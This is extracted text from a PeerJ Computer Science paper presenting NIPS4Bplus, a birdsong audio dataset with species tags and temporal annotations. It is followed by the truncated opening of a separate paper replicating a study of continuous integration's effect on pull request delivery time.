al., 2016; Sovern et al., 2014; Marques et al., 2012). In recent decades, there has been an increasing amount of ecological audio datasets that have tags assigned to them to indicate the presence or not of a specific bird species. Utilising these datasets and the provided tags, many authors have proposed methods for bird audio detection (Adavanne et al., 2017; Pellegrini, 2017) and bird species classification, e.g., in the context of LifeCLEF classification challenges (Goëau et al., 2016; Goëau et al., 2017) and more (Salamon & Bello, 2017; Knight et al., 2017). However, these methods do not predict any information about the temporal location of each event or the number of its occurrences in a recording. Some research has been made into using audio tags in order to predict temporal annotations, labels that contain temporal information about the audio events. This is usually done in a multi-instance learning (MIL) or weakly supervised learning setting. In (Briggs et al., 2014; Ruiz-Muñoz, Orozco-Alzate & Castellanos-Dominguez, 2015), the How to cite this article Morfi V, Bas Y, Pamuła H, Glotin H, Stowell D. 2019. NIPS4Bplus: a richly annotated birdsong audio dataset. PeerJ Comput. Sci. 5:e223 http://doi.org/10.7717/peerj-cs.223 https://peerj.com/computer-science/ mailto:g.v.morfi@qmul.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.223 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.223 authors try to exploit audio tags in birdsong detection and bird species classification, in (Fanioudakis & Potamitis, 2017), the authors use deep networks to tag the temporal location of active bird vocalisations, while in (Roger et al., 2018), the authors propose a bioacoustic segmentation based on the Hierarchical Dirichlet Process (HDP-HMM) to infer song units in birdsong recordings. Furthermore, some methods for temporal predictions by using tags have been proposed for other types of general audio (Schlüter, 2016; Adavanne & Virtanen, 2017; Kumar & Raj, 2016). However, in all the above cases some kind of temporal annotations were used in order to evaluate the performance of the methods. Hence, acquiring temporal annotations is vital even for methods that are in a weakly supervised learning setting. In the field of automatic birdsong monitoring, advances in birdsong detection and classification have approached a limit due to the lack of fully annotated datasets. Annotating ecological data with temporal annotations to train sound event detectors and classifiers is a time consuming task involving a lot of manual labour and expert annotators. There is a high diversity of animal vocalisations, both in the types of the basic syllables and in the way they are combined (S. Brandes, 2008; Kroodsma, 2005). Also, there is noise present in most habitats, and many bird communities contain multiple bird species that can potentially have overlapping vocalizations (Luther, 2008; Luther & Wiley, 2009; Pacifici, Simons & Pollock, 2008). These factors make detailed annotations laborious to gather, while on the other hand acquiring audio tags takes much less time and effort, since the annotator has to only mark the active sound event classes in a recording and not their exact boundaries. This means that many ecological datasets lack temporal annotations of bird vocalisations even though they are vital to the training of automated methods that predict the temporal annotations which could potentially solve the issue of needing a human annotator. Recently, BirdVox-full-night (Lostanlen et al., 2018), a dataset containing some temporal and frequency information about flight calls of nocturnally migrating birds, was released. However, BirdVox-full-night only focuses on avian flight calls, a specific type of bird calls, that usually have a very short duration in time. The temporal annotations provided for them do not include any onset, offset or information about the duration of the calls, they simply contain a single time marker at which the flight call is active. Additionally, there is no distinction between the different bird species, hence no specific species annotations are provided, but only the presence of flight calls through the duration of a recording is denoted. Hence, the dataset can provide data to train models for flight call detection but is not efficient for models performing both event detection and classification for a variety of bird vocalisations. In this paper, we introduce NIPS4Bplus, the first ecological audio dataset that contains bird species tags and temporal annotations. NIPS4Bplus contains temporal annotations for the recordings that comprised the training set of the 2013 Neural Information Processing Scaled for Bioacoustics (NIPS4B) challenge for bird song classification (http://sabiod.univ-tln.fr/nips4b/challenge1.html) that are accessible at Figshare (https://doi.org/10.6084/m9.figshare.6798548) (Morfi, Stowell & Pamuła, 2018). NIPS4Bplus can be used for training supervised automated methods that perform bird Morfi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.223 2/12 https://peerj.com http://sabiod.univ-tln.fr/nips4b/challenge1.html https://doi.org/10.6084/m9.figshare.6798548 http://dx.doi.org/10.7717/peerj-cs.223 Table 1 Some of the latest and most frequently used datasets in tasks related to bird song classification and detection. #recs denotes the num- ber of recordings in the dataset; #classes denotes the numbers of classes in each dataset; species tags indicates if there are species specific labels in the recordings stating the presence of specific species in them; annotations denotes the presence of temporal annotations in recordings; duration de- notes the approximate duration of each dataset in hours; and other info provides additional information about the characteristics of the dataset. Dataset Name #recs #classes species tags annotations duration other info NIPS4Bplus 687 87 Yes Yes 1 h freefield1010 7,690 N/A No No 21 h bird/no-bird tags warblrb10k 10,000 N/A No No 28 h bird/no-bird tags BirdVox-DCASE-20k 20,000 N/A No No 55 h bird/no-bird tags Chernobyl 6,620 N/A No No 18 h bird/no-bird tags PolandNFC 4,000 N/A No No 11 h bird/no-bird tags LifeClef(BirdClef) 2019 50,000 659 Yes No 350 h from xeno-canto LifeClef(BirdClef) 2018 48,843 1500 Yes No 68 h from xeno-canto BirdVox-full-night 6 25 No Yes 60 h points in time vocalisation detection and classification and can also be used for evaluating methods that use only audio tags or no annotations for training. Table 1 presents an overview comparison between NIPS4plus and the most recent and frequently used datasets in tasks related to bird vocalisation classification and detection. During the 2018 Detection and Classifiaction of Acoustic Scenes and Events, the (DCASE) challenge the freefield1010, warblrb10k, BirdVox-DCASE-20k (deriving from BirdVox-full-night (https://wp.nyu.edu/birdvox/birdvox-full-night/)), Chernobyl and PolandNFC datasets were used in task 3 for bird audio detection, namely detecting the presence of any bird in a recording and assigning a file format with the presence of any bird in a recording and assigning a binary label (1:bird, 0:no-bird) to it (http://dcase.community/challenge2018/task-bird-audio-detection). Another very widely known challenge that addresses the task of active bird species identification in a recording is BirdClef, which has been part of the LifeClef challenge since 2014 (https://www.imageclef.org/lifeclef2019). Finally, BirdVox-full-night presented in (Lostanlen et al., 2018), is a dataset of ten hours of night calls annotated as single points in time instead of continuous events, due to the short duration of night calls in the dataset. The datasets used in BirdClef derive from xeno-canto, the largest publicly available bird sound database, that contains over 450,000 recordings of more than 10,000 different bird species (https://www.xeno-canto.org/). Another bird sound database presented in (Arriaga et al., 2015), that has been open to the public since 2015, is Bird- DB (http://taylor0.biology.ucla.edu/birdDBQuery/). Bird-DB consists of more than 800 recordings from over 30 different bird species. In contrast to xeno-canto that only provides tags of the recordings with the bird species present in it, the recordings in Bird-DB include temporal annotations identifying the bird species and also classifying the vocalisation. Even though Bird-DB provides temporal annotation, it is meant to be used as a database and is not very convenient as a dataset. This is mainly due to the fact that any user can upload recordings and their annotations, additionally, each recording and annotation pair needs to be downloaded separately. Morfi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.223 3/12 https://peerj.com https://wp.nyu.edu/birdvox/birdvox-full-night/ http://dcase.community/challenge2018/task-bird-audio-detection https://www.imageclef.org/lifeclef2019 https://www.xeno-canto.org/ http://taylor0.biology.ucla.edu/birdDBQuery/ http://dx.doi.org/10.7717/peerj-cs.223 The rest of the paper is structured as follows: Audio Data Collection describes the process of collecting and selecting the recordings comprising the dataset, Annotations presents our approach of acquiring the tags and temporal annotations and provides statistical information about the labels and recordings comprising the dataset followed by Example Uses of NIPS4Bplus and Conclusion. AUDIO DATA COLLECTION The recordings that comprise the NIPS4B 2013 training and testing dataset were collected by recorders placed in 39 different locations, which can be summarised by seven regions in France and Spain. Twenty percent of the recordings were collected from the Haute-Loire region in Central France, 65% of them were collected from the Pyrénées-Orientales, Aude and Hérault regions in south-central France along the Mediterranean cost and the remaining 15% of the recordings originated from the Granada, Jaén and Almeria regions in eastern Andalusia, Spain. The Haute-Loire area is a more hilly and cold region, while the rest of the regions are mostly along the Mediterranean coast and have a more Mediterranean climate. The recorders used were the SM2BAT (https://bit.ly/2RBf1cd) using SMX-US microphones (https://www.wildlifeacoustics.com/images/pdfs/UltrasonicMicrophones. pdf), both produced by Wildlife Acoustics (https://www.wildlifeacoustics.com/). They were originally put in the field for bat echolocation call sampling, but they were also set to record for 3 h single channel at 44.1 kHz sampling rate starting 30 min after sunrise, right after bat sampling. The recorders were set to a 6 dB Signal-to-Noise Ratio (SNR) trigger with a window of 2 s, and acquired recordings only when the trigger was activated. Approximately 30 h of field recordings were collected. Any recording longer than 5 s was split into multiple 5 s files. SonoChiro, a chirp detection tool used for bat vocalisation detection, was used on each file to identify recordings with bird vocalisations (http://www.leclub-biotope.com/fr/72-sonochiro). A stratified random sampling was then applied to all acquired recordings, based on locations and clustering of features, to maximise the diversity in the labelled dataset, resulting in nearly 5,000 files being chosen. Following the first stage of selection, manual annotations were produced for the classes active in these 5,000 files and any recordings that contained unidentified species’ vocalisations were discarded. Furthermore, the training set and testing set recordings were allocated so that the same species were active in both. Finally, for training purposes, only species that could be covered by at least seven recordings in the training set were included in the final dataset, the rest were considered rare species’ occurrences that would make it hard to train any classifier; hence, they were discarded. The final training and testing set consist of 687 files of total duration of less than an hour, and 1,000 files of total duration of nearly two hours, respectively. Morfi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.223 4/12 https://peerj.com https://bit.ly/2RBf1cd https://www.wildlifeacoustics.com/images/pdfs/UltrasonicMicrophones.pdf https://www.wildlifeacoustics.com/images/pdfs/UltrasonicMicrophones.pdf https://www.wildlifeacoustics.com/ http://www.leclub-biotope.com/fr/72-sonochiro http://dx.doi.org/10.7717/peerj-cs.223 Figure 1 Label occurrences on different regions. Number of occurrences of each sound type in record- ings collected from Spain, Southern France and Central France. Full-size DOI: 10.7717/peerjcs.223/fig-1 ANNOTATIONS Tags The labels for the species active in each recording of the training set were initially created for the NIPS4B 2013 bird song classification challenge (Glotin et al., 2013). There is a total of 51 different bird species active in the dataset. For some species we discriminate the song from the call and from the drum. We also include some species living with these birds: nine insects and an amphibian. This tagging process resulted in 87 classes. A detailed list of the class names and their corresponding species English and scientific names can be found in (Morfi, Stowell & Pamuła, 2018). These tags only provide information about the species active in a recording and do not include any temporal information. In addition to the recordings containing bird vocalisations, some training files only contain background noise acquired from the same regions and have no bird song in them, these files can be used to tune a model during training. Figure 1 depicts the number of occurrences per class for recordings collected in each of the three different general regions of Spain, South France and Central France. Each tag is represented by at least seven up to a maximum of 20 recordings. Each recording that contains bird vocalisations includes one to six individual labels. These files may contain different vocalisations from the same species and also may contain a variety of other species that vocalise along with this species. Figure 2 depicts the distribution of the number of active classes in the dataset. Figure 3 depicts the number of co-occurrences between pairs of labels. We can notice that there are no notable patterns to the ways species vocalisations co-occur. One interesting thing one can notice while studying the co-occurrence heat map is that there is no strong correlation between calls and songs from the same species, this is due to the different functions between calls and songs produced. As calls may be related to self-maintenance activities such as species identification or holding the flock together, while songs are mostly used for attracting a mate, establishing territories, intimidating enemies and learning through imitations and practising. Temporal annotations Temporal annotations for each recording in the training set of the NIPS4B dataset were produced manually using Sonic Visualiser (https://www.sonicvisualiser.org/). The temporal Morfi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.223 5/12 https://peerj.com https://doi.org/10.7717/peerjcs.223/fig-1 https://www.sonicvisualiser.org/ http://dx.doi.org/10.7717/peerj-cs.223 Figure 2 Number of active classes throughout the dataset. Distribution of number of active classes in dataset recordings. Full-size DOI: 10.7717/peerjcs.223/fig-2 annotations were made by a single annotator, Hanna Pamuła, and can be found in (Morfi, Stowell & Pamuła, 2018). Table 2 presents the temporal annotation format as is provided in NIPS4Bplus. In Fig. 4 we present the mean duration for every class activation in all the recordings. Most classes have a brief duration of less than 0.5 s, with most of the insect classes (marked with red bars) having a longer duration. Finally, in Fig. 5 we report the total number of activations for each class in the dataset, with the minimum being 1 and the maximum being 282. In concern to the temporal annotations for the dataset, we should mention the following: • The original tags were used for guidance; however, some files were judged to have a different set of species than the ones given in the original metadata. Similarly, in a few rare occurrences, despite the tags suggesting a bird species active in a recording, the annotator was not able to detect any bird vocalisation. • An extra ‘Unknown’ tag was added to the dataset for vocalisations that could not be classified to a class. • An extra ‘Human’ tag was added to a few recordings that have very obvious human sounds, such as speech, present in them. • Out of the 687 recordings of the training set 100 recordings contain only background noise, hence no temporal annotations were needed for them. • Of the remaining 587 recordings that contain vocalisations, six could not be unambiguously labelled due to hard to identify vocalisations, thus no temporal annotation files were produced for them. • An annotation file for any recording containing multiple insects does not differentiate between the insect species and the ‘Unknown’ label was given to all insect species present. Morfi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.223 6/12 https://peerj.com https://doi.org/10.7717/peerjcs.223/fig-2 http://dx.doi.org/10.7717/peerj-cs.223 Figure 3 Label co-occurrence heat map. Distribution of number of active classes in dataset recordings. Full-size DOI: 10.7717/peerjcs.223/fig-3 Table 2 An example of NIPS4Bplus temporal annotations. Starting Time (sec) Duration (sec) Tag 0.00 0.37 Serser_call 0.00 2.62 Ptehey_song 1.77 0.06 Carcar_call 1.86 0.07 Carcar_call 2.02 0.41 Serser_call 3.87 1.09 Ptehey_song • In the rare case where no birds were active along with the insects no annotation file was provided. Hence, seven recordings containing only insects were left unlabelled. • In total, 13 recordings have no temporal annotation files. These can be used when training a model that does not use temporal annotations. Morfi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.223 7/12 https://peerj.com https://doi.org/10.7717/peerjcs.223/fig-3 http://dx.doi.org/10.7717/peerj-cs.223 Figure 4 Mean value and standard deviation of the duration of each class in NIPS4Bplus in seconds. Blue bars indicate bird label, red bars indicate insect label and green indicate amphibian. Full-size DOI: 10.7717/peerjcs.223/fig-4 Figure 5 Total number of each class activations in NIPS4Bplus. Blue bars indicate bird label, red bars indicate insect label and green indicate amphibian. Full-size DOI: 10.7717/peerjcs.223/fig-5 • On some occasions, the different syllables of a song were separated in time into different events while in other occasions they were summarised into a larger event, according to the judgement of the expert annotator. This variety could help train an unbiased model regarding separating events or grouping them together as one continuous time event. As mentioned above, each recording may contain multiple species vocalising at the same time. This can often occur in wildlife recordings and is important to be taken into account when training a model. Fig. 6 presents the fraction of the total duration containing overlapping vocalisations as well as the number of simultaneously occurring classes. EXAMPLE USES OF NIPS4BPLUS A few examples of the NIPS4Bplus dataset and temporal annotations being used can be found in (Morfi & Stowell, 2018a) and (Morfi & Stowell, 2018b). First, in (Morfi & Stowell, 2018a), we use NIPS4Bplus to carry out the training and evaluation of a newly proposed multi-instance learning (MIL) loss function for audio event detection. And in (Morfi & Stowell, 2018b), we combine the proposed method of (Morfi & Stowell, 2018a) and a network trained on the NIPS4Bplus tags that performs audio tagging in a multi-task learning (MTL) setting. Morfi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.223 8/12 https://peerj.com https://doi.org/10.7717/peerjcs.223/fig-4 https://doi.org/10.7717/peerjcs.223/fig-5 http://dx.doi.org/10.7717/peerj-cs.223 Figure 6 Number of simultaneous active classes over the total duration of the data. Distribution of si- multaneous number of active classes on the total duration of the recordings. Full-size DOI: 10.7717/peerjcs.223/fig-6 For both experiments, we split the NIPS4B training dataset into a training set and a testing set. For our training set, the first 499 recordings of the NIPS4B training dataset are used, while the rest are included in our testing set, excluding 14 recordings for which confident strong annotations could not be attained. Those 14 recordings are added to our training set resulting to a grand total of 513 training recordings and 174 testing recordings. Out of the 513 training recordings a small subset of them are used during training for validation purposes only. More specifically, the validation set consists of 63 recordings (55 containing at least one bird vocalisation, 8 without any vocalisation), with the rest 450 recordings (385 containing at least one bird vocalisation, 65 without any vocalisation) used only for training the model. Detailed results can be found in Morfi & Stowell (2018a) and Morfi & Stowell (2018b). Additional applications using NIPS4Bplus could include training models for bird species audio event detection and classification, evaluating how generalisable of method trained on a different set of data is, and many more. More specifically, the dataset and the temporal annotations can be used for evaluating methods that have been trained without temporally annotated data. In general, this kind of data, that lack temporal annotation, can be easily acquired in a large scale which is suitable for training deep learning approaches. However, temporally annotated data are needed to properly evaluate the performance of models that perform their prediction, hence another way of using NIPS4Bplus along with other datasets is as an evaluation set. CONCLUSION In this paper, we present NIPS4Bplus, the first richly annotated birdsong audio dataset. NIPS4Bplus is comprised of the NIPS4B dataset and tags used for the 2013 bird song Morfi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.223 9/12 https://peerj.com https://doi.org/10.7717/peerjcs.223/fig-6 http://dx.doi.org/10.7717/peerj-cs.223 classification challenge plus the newly acquired temporal annotations. We provide statistical information about the recordings, their species specific tags and their temporal annotations. ACKNOWLEDGEMENTS We thank Sylvain Vigant for providing recordings from Central France, and BIOTOPE for making the data public for the NIPS4B 2013 bird classification challenge. ADDITIONAL INFORMATION AND DECLARATIONS Funding Dan Stowell is supported by EPSRC fellowship EP/L020505/1. Hanna Pamuła is supported by AGH-UST Dean’s Grant number 16.16.130.942. SABIOD MI CNRS provided financial support for the NIPS4B challenge, and EADM MaDICS CNRS provided ANR-18-CE40- 0014 SMILES supporting this research. Grant Disclosures The following grant information was disclosed by the authors: EPSRC fellowship: EP/L020505/1. AGH-UST Dean’s: 16.16.130.942. NIPS4B challenge. EADM MaDICS CNRS: ANR-18-CE40-0014. Competing Interests Dan Stowell is an Academic Editor for PeerJ. Author Contributions • Veronica Morfi conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Yves Bas, Hanna Pamuła and Hervé Glotin analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • Dan Stowell conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: The data is available at Figshare: Morfi, Veronica; Stowell, Dan; Pamula, Hanna (2018): NIPS4Bplus: Transcriptions of NIPS4B 2013 Bird Challenge Training Dataset. figshare. Dataset. https://doi.org/10.6084/m9.figshare.6798548. Morfi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.223 10/12 https://peerj.com https://doi.org/10.6084/m9.figshare.6798548 http://dx.doi.org/10.7717/peerj-cs.223 REFERENCES Adavanne S, Drossos K, Çakir E, Virtanen T. 2017. Stacked convolutional and recurrent neural networks for bird audio detection. In: 2017 25th European Signal Processing Conference (EUSIPCO). 1729–1733 DOI 10.23919/EUSIPCO.2017.8081505. Adavanne S, Virtanen T. 2017. Sound event detection using weakly labeled dataset with stacked convolutional and recurrent neural network. In: Proceedings of the detection and classification of acoustic scenes and events 2017 workshop (DCASE2017). 12–16. Arriaga JG, Cody ML, Vallejo EE, Taylor CE. 2015. Bird-DB: a database for annotated bird song sequences. Ecological Informatics 27:21–25 DOI 10.1016/j.ecoinf.2015.01.007. Brandes TS. 2008. Automated sound recording and analysis techniques for bird surveys and conservation. Bird Conservation International—BIRD CONSERV INT 18:S163–S173 DOI 10.1017/S0959270908000415. Briggs F, Lakshminarayanan B, Neal L, Fern X, Raich R, Hadley S. JK, Hadley AS, Betts MG. 2014. Acoustic classification of multiple simultaneous bird species: a multi-instance multi-label approach. Journal of the Acoustic Society of America 131:4640–4650. Dawson DK, Efford MG. 2009. Bird population density estimated from acoustic signals. Journal of Applied Ecology 46(6):1201–1209 DOI 10.1111/j.1365-2664.2009.01731.x. Drake KL, Frey M, Hogan D, Hedley R. 2016. Using digital recordings and sonogram analysis to obtain counts of yellow rails. Wildlife Society Bulletin 40(2):346–354 DOI 10.1002/wsb.658. Fanioudakis L, Potamitis I. 2017. Deep networks tag the location of bird vocalisations on audio spectrograms. ArXiv preprint. arXiv:1711.04347. Glotin H, LeCun Y, Artières T, Mallat S, Tchernichovski O, Halkias X. 2013. Neural information processing scaled for bioacoustics—from neurons to big data. In: Proceedings of Neural Information Processing Scaled for Bioacoustics: from Neurons to Big Data, 2013. Available at http://sabiod.univ-tln.fr/NIPS4B2013_book.pdf . Goëau H, Glotin H, Vellinga W-P, Planqué R, Joly A. 2016. LifeCLEF bird identification task 2016: the arrival of deep learning. In: CLEF 2016 CEUR-WS, vol. 1609. 440–449. Available at http://ceur-ws.org/Vol-1609/ . Goëau H, Glotin H, Vellinga W-P, Planqué R, Joly A. 2017. LifeCLEF bird identification task 2017. In: CLEF 2017 CEUR-WS, vol. 1866. Available at http://ceur-ws.org/Vol- 1866/ . Knight EC, Hannah KC, Foley G, Scott C, Brigham RM, Bayne E. 2017. Recommen- dations for acoustic recognizer performance assessment with application to five common automated signal recognition programs. Avian Conservation and Ecology 12(2):Article 14. Kroodsma D. 2005. The singing life of birds: audio CD. In: The singing life of birds: the art and science of listening to birdsong. Houghton Mifflin. Kumar A, Raj B. 2016. Audio event detection using weakly labeled data. New York: ACM, 1038–1047. Morfi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.223 11/12 https://peerj.com http://dx.doi.org/10.23919/EUSIPCO.2017.8081505 http://dx.doi.org/10.1016/j.ecoinf.2015.01.007 http://dx.doi.org/10.1017/S0959270908000415 http://dx.doi.org/10.1111/j.1365-2664.2009.01731.x http://dx.doi.org/10.1002/wsb.658 http://arXiv.org/abs/1711.04347 http://sabiod.univ-tln.fr/NIPS4B2013_book.pdf http://ceur-ws.org/Vol-1609/ http://ceur-ws.org/Vol-1866/ http://ceur-ws.org/Vol-1866/ http://dx.doi.org/10.7717/peerj-cs.223 Lambert KTA, McDonald PG. 2014. A low-cost, yet simple and highly repeatable system for acoustically surveying cryptic species. Austral Ecology 39(7):779–785 DOI 10.1111/aec.12143. Lostanlen V, Salamon J, Farnsworth A, Kelling S, Bello JP. 2018. BirdVox-full-night: a dataset and benchmark for avian flight call detection. In: Proceedings of the IEEE ICASSP. Pistacaway: IEEE. Luther D. 2008. Signaller: receiver coordination and the timing of communication in Amazonian birds. Biology Letters 4:651–654 DOI 10.1098/rsbl.2008.0406. Luther D, Wiley R. 2009. Production and perception of communicatory signals in a noisy environment. Biology Letters 5:183–187 DOI 10.1098/rsbl.2008.0733. Marques TA, Thomas L, Martin SW, Mellinger DK, Ward JA, Moretti DJ, Harris D, Tyack PL. 2012. Estimating animal population density using passive acoustics. Biological Reviews 88(2):287–309 DOI 10.1111/brv.12001. Morfi V, Stowell D. 2018a. Data-efficient weakly supervised learning for low-resource audio event detection using deep learning. In: Proceedings of the detection and classification of acoustic scenes and events 2018 workshop (DCASE 2018). 123–127. Morfi V, Stowell D. 2018b. Deep learning for audio event detection and tagging on low- resource datasets. Applied Sciences 8(8):Article 1397 DOI 10.3390/app8081397. Morfi V, Stowell D, Pamuła H. 2018. Transcriptions of NIPS4B 2013 bird challenge training dataset. (accessed on 15 July 2019) DOI 10.6084/m9.figshare.6798548. Pacifici K, Simons TR, Pollock KH. 2008. Effects of vegetation and background noise on the detection process in auditory avian point-count surveys. The Auk 125(4):998–998 DOI 10.1525/auk.2008.111008. Pellegrini T. 2017. Densely connected CNNs for bird audio detection. In: 2017 25th European Signal Processing Conference (EUSIPCO). 1734–1738 DOI 10.23919/EUSIPCO.2017.8081506. Roger V, Bartcus M, Chamroukhi F, Glotin H. 2018. Unsupervised bioacoustic seg- mentation by hierarchical Dirichlet process hidden Markov model. In: Multimedia tools and applications for environmental & biodiversity informatics. Cham: Springer, 113–130. Ruiz-Muñoz JF, Orozco-Alzate M, Castellanos-Dominguez G. 2015. Multiple instance learning-based birdsong classification using unsupervised recording segmentation. In: Proceedings of the 24th International Conference on Artificial Intelligence, IJCAI’15. Menlo Park: AAAI Press, 2632–2638. Salamon J, Bello JP. 2017. Deep convolutional neural networks and data augmentation for environmental sound classification. IEEE Signal Processing Letters 24:279–283 DOI 10.1109/LSP.2017.2657381. Schlüter J. 2016. Learning to pinpoint singing voice from weakly labeled examples. In: Proceedings of the 17th international society for music information retrieval conference (ISMIR 2016). Available at http://www.ofai.at/~jan.schlueter/pubs/2016_ismir.pdf . Sovern SG, Forsman ED, Olson GS, Biswell BL, Taylor M, Anthony RG. 2014. Barred owls and landscape attributes influence territory occupancy of northern spotted owls. The Journal of Wildlife Management 78(8):1436–1443 DOI 10.1002/jwmg.793. Morfi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.223 12/12 https://peerj.com http://dx.doi.org/10.1111/aec.12143 http://dx.doi.org/10.1098/rsbl.2008.0406 http://dx.doi.org/10.1098/rsbl.2008.0733 http://dx.doi.org/10.1111/brv.12001 http://dx.doi.org/10.3390/app8081397 http://dx.doi.org/10.6084/m9.figshare.6798548 http://dx.doi.org/10.1525/auk.2008.111008 http://dx.doi.org/10.23919/EUSIPCO.2017.8081506 http://dx.doi.org/10.1109/LSP.2017.2657381 http://www.ofai.at/~jan.schlueter/pubs/2016_ismir.pdf http://dx.doi.org/10.1002/jwmg.793 http://dx.doi.org/10.7717/peerj-cs.223 work_ufl2p734qbcd7nplzgj3g2poi4 ---- Submitted 15 August 2019 Accepted 10 November 2019 Published 16 December 2019 Corresponding author Philipp Leitner, philipp.leitner@chalmers.se Academic editor Arie van Deursen Additional Information and Declarations can be found on page 21 DOI 10.7717/peerj-cs.245 Copyright 2019 Guo and Leitner Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Studying the impact of CI on pull request delivery time in open source projects—a conceptual replication Yunfang Guo and Philipp Leitner Software Engineering Division, Chalmers | University of Gothenburg, Gothenburg, Sweden ABSTRACT Nowadays, continuous integration (CI) is indispensable in the software development process. A central promise of adopting CI is that new features or bug fixes can be delivered more quickly. A recent repository mining study by Bernardo, da Costa & Kulesza (2018) found that only about half of the investigated open source projects actually deliver pull requests (PR) faster after adopting CI, with small effect sizes. However, there are some concerns regarding the methodology used by Bernardo et al., which may potentially limit the trustworthiness of this finding. Particularly, they do not explicitly control for normal changes in the pull request delivery time during a project’s lifetime (independently of CI introduction). Hence, in our work, we conduct a conceptual replication of this study. In a first step, we replicate their study results using the same subjects and methodology. In a second step, we address the same core research question using an adapted methodology. We use a different statistical method (regression discontinuity design, RDD) that is more robust towards the confounding factor of projects potentially getting faster in delivering PRs over time naturally, and we introduce a control group of comparable projects that never applied CI. Finally, we also evaluate the generalizability of the original findings on a set of new open source projects sampled using the same methodology. We find that the results of the study by Bernardo et al. largely hold in our replication. Using RDD, we do not find robust evidence of projects getting faster at delivering PRs without CI, and we similarly do not see a speed-up in our control group that never introduced CI. Further, results obtained from a newly mined set of projects are comparable to the original findings. In conclusion, we consider the replication successful. Subjects Software Engineering Keywords Continuous integration, Mining software repositories, Replication, Pull-request based development INTRODUCTION Continuous Integration (CI) is by now a popular practice in the software commu- nity (Duvall, Matyas & Glover, 2007). CI helps developers integrate changes frequently in a collaborative manner. As a distributed and cooperative practice, CI is commonly used in both, commercial and open source software (OSS) development. Considerable previous research has investigated the impact of CI on OSS projects. Vasilescu et al. (2015) found that core developers are able to discover more bugs using CI. Ståhl & Bosch (2014) claim that integrators tend to release more frequently after adopting CI. Finally, a recent study How to cite this article Guo Y, Leitner P. 2019. Studying the impact of CI on pull request delivery time in open source projects—a con- ceptual replication. PeerJ Comput. Sci. 5:e245 http://doi.org/10.7717/peerj-cs.245 https://peerj.com/computer-science mailto:philipp.leitner@chalmers.se https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.245 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.245 by Bernardo, da Costa & Kulesza (2018) empirically analyzed whether CI improves the time-to-delivery of merged Pull Requests (PRs) that are submitted to GitHub projects. Interestingly, this study revealed that only 51.3% of the analyzed OSS projects actually deliver merged PRs more quickly after adopting CI. The authors present an increase in PR submission numbers after adopting CI as a possible reason for this relatively counter- intuitive result. Further, the authors used regression analysis to identify two factors (merge workload and queue rank) that are the main predictors of PR delivery time. However, we observe that the study by Bernardo et al. exhibits some important limitations. Firstly, their methodology consists of comparing various PR related metrics before and after CI adoption without controlling for confounding factors, most importantly that PR delivery time may increase or decrease naturally over the lifetime of a project. For example, it is conceivable that projects may just naturally get better at merging PRs over time, independently of whether they adopt CI or not. Secondly, they do not make use of a control group of projects that never adopted CI in the first place. In our opinion, this limits the trustworthiness of the results of Bernardo et al. Hence, in our work, we present a conceptual replication (Shull et al., 2008) of this study. We replicate their work and investigate the same research questions with slightly different methodology, and by incorporating additional study objects. Concretely, we investigate the following research questions. RQ1: Exact Replication. Can the original study results be reproduced? As a baseline, we reproduce the original results of the study, using the same methodology and the data provided by the authors. We are able to achieve very similar results, with minor differences (between 1.1 and 5.5 percentage points difference to the originally published results). RQ2: Conceptual Replication. To extend the original study methodology, and address the concerns we have with the experimental methodology as initially proposed, we investigate two different aspects: RQ2.1: Can similar results to the original study be found when controlling for changes in PR delivery time over the lifetime of a project? To answer this question, we apply Regression Discontinuity Design –RDD (Thistlethwaite & Campbell, 1960), a statistical method that allowed us to evaluate whether there is a trend of PR delivery times over time, and whether this trend changes significantly when CI is introduced. We find no clear evidence of such trends in the data, alleviating our concerns in this regard. However, we observe that PR delivery times depend strongly on when in the release cycle a PR is merged. PRs that are merged close to the next release are released much quicker than PRs that come in shortly after a release. This indicates that, ultimately, CI introduction may have less impact on PR delivery times than how often a project releases. RQ2.2: Are there other factors besides merge workload and queue rank that strongly impact the PR delivery time? Based on the results of RQ2.1, we hypothesize that one important factor impacting PR delivery time that is not directly captured in the original study is when in the release cycle a new PR is submitted. We incorporate this additional variable into the regression model, and evaluate whether it is a better predictor than the variables in the Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 2/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.245 original study. We find that this ‘‘come-in time’’ indeed is the best predictor of PR delivery time for a majority of projects. RQ3: Generalizability. Finally, to evaluate the generalizability of the results, we apply our adapted methodology to two new data sets, a new data set of study subjects collected using the same methodology as in the original study, and a control group of projects that have similar characteristics but have, to the best of our knowledge, never applied CI. RQ3.1: Can similar results be found when applying the same methodology to different projects that have also adopted CI? We find that results found for a new set of study subjects vary up to 14 percentage points. However, the high-level conclusions drawn by the original study still hold for our replication using new data. Hence, we consider the original findings to be largely confirmed using additional data, with the caveat that the individual differences between projects may be very high. RQ3.2: Can similar results be found when applying the same methodology to different projects that have never adopted CI? Finally, we collect a control group of comparable projects that have never adopted 